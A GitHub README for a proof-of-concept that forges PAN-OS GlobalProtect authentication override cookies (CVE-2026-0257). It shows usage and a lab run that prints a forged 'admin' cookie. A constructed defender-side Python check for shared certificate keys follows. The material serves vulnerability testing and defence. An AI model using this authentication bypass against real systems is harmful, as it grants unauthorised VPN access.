sfewer-r7/CVE-2026-0257

GitHub: sfewer-r7/CVE-2026-0257

# Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257)

A proof-of-concept script to test a target PAN-OS GlobalProtect portal or gateway for [CVE-2026-0257](https://security.paloaltonetworks.com/CVE-2026-0257). The script attempts to forge a valid authentication override cookie by iterating over the certificate chain used by the HTTPS service. For every public key in the chain, it forges a new authentication override cookie and tests it against the GlobalProtect target to see if it is valid. A successfully forged cookie will log in to the GlobalProtect target and retrieve VPN connection information (use the `--verbose` argument to inspect the full response).

## Usage

```
$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
                       [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).

options:
  -h, --help            show this help message and exit
  --target TARGET       Target GlobalProtect portal or gateway (IP or hostname)
  --port PORT           Target port (default: 443)
  --user USER           Username to forge cookie for (default: admin)
  --domain DOMAIN       Domain for cookie (default: empty)
  --host-id HOST_ID     Host ID for cookie (default: empty)
  --client-os CLIENT_OS
                        Client OS for cookie (default: Windows)
  --client-ip CLIENT_IP
                        Client IP in cookie (default: 0.0.0.0)
  --context {gateway,portal,both}
                        Context to test: gateway, portal, or both (default target)
  --verbose             Print full response
```

## Example

```
$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
    Found 2 certificate(s) in chain:
      [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
      [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)
[*] Forging cookie for user 'admin', testing each key
    Trying [0] CN=192.168.86.99
    [-] Failure - Gateway did not accepted the forged cookie
    [-] Failure - Portal did not accepted the forged cookie
    Trying [1] CN=GP-Lab-CA
    [+] Success - Gateway accepted the forged cookie
        Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==
```
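
A defender-side check for the condition the script probes, added here as an example and not part of this repository: it reports which certificates in a served TLS chain share a public key with the certificate used for authentication override cookies. It assumes you hold both as DER bytes and know which certificate your configuration uses for cookies; all function names and the skeletal sample certificates are constructed for illustration.

```python
import hashlib

def _tlv(buf, off):
    """Parse the DER element at off; return (tag, value_start, value_end)."""
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, off, off + length

def spki_sha256(cert_der):
    """SHA-256 of the SubjectPublicKeyInfo element of a DER X.509 certificate."""
    _, off, _ = _tlv(cert_der, 0)          # step into Certificate
    _, off, _ = _tlv(cert_der, off)        # step into tbsCertificate
    tag, _, end = _tlv(cert_der, off)
    if tag == 0xA0:                        # skip optional [0] version
        off = end
    for _field in range(5):                # serial, signature, issuer, validity, subject
        _, _, off = _tlv(cert_der, off)
    _, _, end = _tlv(cert_der, off)        # subjectPublicKeyInfo
    return hashlib.sha256(cert_der[off:end]).hexdigest()

def cookie_key_in_chain(cookie_cert_der, chain_ders):
    """Indexes of served chain certificates whose public key equals the cookie certificate's."""
    want = spki_sha256(cookie_cert_der)
    return [i for i, c in enumerate(chain_ders) if spki_sha256(c) == want]

# --- Constructed sample data: skeletal DER, not real signed certificates ---
def _der(tag, body):
    n = len(body)
    size = (n.bit_length() + 7) // 8
    head = bytes([n]) if n < 0x80 else bytes([0x80 | size]) + n.to_bytes(size, "big")
    return bytes([tag]) + head + body

def sample_cert(cn, key):
    name = _der(0x30, _der(0x0C, cn.encode()))
    spki = _der(0x30, _der(0x30, b"") + _der(0x03, b"\x00" + key))
    tbs = _der(0x30, _der(0xA0, _der(0x02, b"\x02")) + _der(0x02, b"\x01")
               + _der(0x30, b"") + name + _der(0x30, b"") + name + spki)
    return _der(0x30, tbs + _der(0x30, b"") + _der(0x03, b"\x00"))

LEAF = sample_cert("portal.example", b"\x11" * 270)
LAB_CA = sample_cert("Example-Lab-CA", b"\x22" * 270)
DEDICATED = sample_cert("cookie-only.example", b"\x33" * 270)

if __name__ == "__main__":
    for label, cert in (("CA cert reused for cookies", LAB_CA), ("dedicated cert", DEDICATED)):
        print(label, "-> chain indexes sharing its key:", cookie_key_in_chain(cert, [LEAF, LAB_CA]))
```

For real certificates, `ssl.PEM_cert_to_DER_cert()` from the standard library converts each PEM block to the DER bytes these functions expect.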